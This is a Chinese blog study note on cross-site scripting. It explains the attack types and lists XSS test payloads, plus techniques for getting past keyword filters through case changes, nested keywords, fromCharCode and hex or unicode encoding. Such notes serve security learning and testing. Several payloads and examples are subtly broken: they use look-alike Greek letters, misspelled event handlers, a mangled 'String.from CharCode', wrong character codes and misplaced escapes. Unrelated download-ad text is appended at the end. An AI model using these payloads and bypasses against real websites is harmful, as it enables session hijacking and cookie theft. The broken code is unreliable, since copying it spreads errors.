xss解析---笔记

一、xss概述

XSS介绍:
  跨站脚本(cross-site scripting,XSS)是一种安全攻击,其中,攻击者在看上去来源可靠的链接中恶意嵌入译码。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。
  
特点:
能注入恶意代码到用户的客户端浏览器的网页上,从而达到劫持用户会话的目的。

XSS的危害
窃取Cookies、蠕虫、钓鱼等等。

XSS分类

1、反射型
  介绍:XSS反射型攻击,恶意代码并没有保存在目标网站,通过引诱用户点击一个链接到目标网站的恶意链接来实施攻击的。
一般使用的时候是将构造好的URL发送给目标者,诱使其点击链接后触发攻击,但是这种的只能使用一次,非持久化的。

2、存储型XSS
  比反射性的XSS更具有威胁性,并且可能影响到web服务器是我自身安全,这种的不需要用户自己点击特定的链接就可以执行,攻击者将恶意代码上传到服务器中,或存储在漏洞服务中,只要浏览器包含有这个恶意代码的问题,就会受到攻击。

二、xss挖掘与绕过

1、火狐中常用的XSS调试插件

hackbar、firebug、tamper data、live http headers、editor cookie(编辑cookie)

2、XSS漏洞挖掘:

2.1挖掘方式:

手工挖掘、工具挖掘、标签闭合、AWVS

手工挖掘XSS漏洞

站点:http://www.xx.com/xss.php?id=1,将payload分别添加到id=1的地方进行测试

常测试的地方是有输入的地方,文件上传的地方、flash、、闭合标签


<script>alert(1)</script>

 "'><script>alert(1)</script>

 <img/src=@οnerrοr=alert(1)/>

 "'><img/src=@onerrer=alert(1)/>

 'omouseover=alert(1) x='

 "οnmοuseοver=alert(1) x="

  'onmousover=alert(1) x="

  javascript:alert(1)//

  data:text/html;base64,PHNjcmludD5==

"';alert(1)//

 </script><script>alert(1)//

 }x:expression(alert(1))

 alert(1)//

工具挖掘XSS漏洞

AWVS  netsparke  appscan  burpsuie  xsser xsscrapy  bratexssr  OWASP Xemotix

3、常见的预防xss代码

$x=preg_replace("/script/","",$x);
$x=preg_replace("/script/i","",$x);
$x=preg_replace("/alert/","",$x);
$x=preg_replace("/script/","",$x);
这里面,i是代表不区分大小写
上述的代码是指将检测到的关键字用空格替换
对于区分大小写我们可以对关键字进大小写的转换
对于替换成空格的我们可以重复覆盖,如:<SCRSCRRTPIPT>他将里面的一个替换成空格后还会剩下一个

4、绕过限制

当存在XSS但又有waf或过滤策略时,有以下几种绕过方法:

1、绕过magic_quotes_gpc

2、编码绕过

3、改变大小写

4、闭合标签

5、绕过 magic_quotes_gps

magic_quotes_gps=ON是PHP中的安全设置,开启后会将一些字符进行转化
如:’(单引号)------> ’
“(双引号)-------->”
\ ----------> \

所以   <script>alert("xss")</script>会变成
      <script>alert(\"xss"\)</script>


使用String.from CharCode();
       将alert("xss")
      String.from CharCode(97,108,101,114,11640,34,88,83,34,41)
      那么xss语句就变成了:
       <script>String.from CharCode(97,108,101,114,11640,34,88,83,34,41)</script>
       String.from CharCode()函数:js中把ASCII转换为字符串

6、编码绕过

使用hex编码来绕过

<script>alert(\"xss"\)</script>
改为
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%5c%22%78%73%73%22%5c%29%3c%2f%73%63%72%69%70%74%3e

或者
<用\u003c
>用\u003e
解决限制字符(要求同页面)

在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【优质项目推荐】 1、项目代码均经过严格本地测试,运行OK,确保功能稳定后才上传平台。可放心下载并立即投入使用,若遇到任何使用问题,随时欢迎私信反馈与沟通,博主会第一时间回复。 2、项目适用于计算机相关专业(如计科、信息安全、数据科学、人工智能、通信、物联网、自动化、电子信息等)的在校学生、专业教师,或企业员工,小白入门等都适用。 3、该项目不仅具有很高的学习借鉴价值,对于初学者来说,也是入门进阶的绝佳选择;当然也可以直接用于 毕设、课设、期末大作业或项目初期立项演示等。 3、开放创新:如果您有一定基础,且热爱探索钻研,可以在此代码基础上二次开发,进行修改、扩展,创造出属于自己的独特应用。 欢迎下载使用优质资源!欢迎借鉴使用,并欢迎学习交流,共同探索编程的无穷魅力! 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip
提供的源码资源涵盖了安卓应用、小程序、Python应用和Java应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编写,确保了在对应环境下能够无缝运行。同时,源码中配备了详细的注释和文档,帮助用户快速理解代码结构和实现逻辑。 适用人群: 这些源码资源特别适合大学生群体。无论你是计算机相关专业的学生,还是对其他领域编程感兴趣的学生,这些资源都能为你提供宝贵的学习和实践机会。通过学习和运行这些源码,你可以掌握各平台开发的基础知识,提升编程能力和项目实战经验。 使用场景及目标: 在学习阶段,你可以利用这些源码资源进行课程实践、课外项目或毕业设计。通过分析和运行源码,你将深入了解各平台开发的技术细节和最佳实践,逐步培养起自己的项目开发和问题解决能力。此外,在求职或创业过程中,具备跨平台开发能力的大学生将更具竞争力。 其他说明: 为了确保源码资源的可运行性和易用性,特别注意了以下几点:首先,每份源码都提供了详细的运行环境和依赖说明,确保用户能够轻松搭建起开发环境;其次,源码中的注释和文档都非常完善,方便用户快速上手和理解代码;最后,我会定期更新这些源码资源,以适应各平台技术的最新发展和市场需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值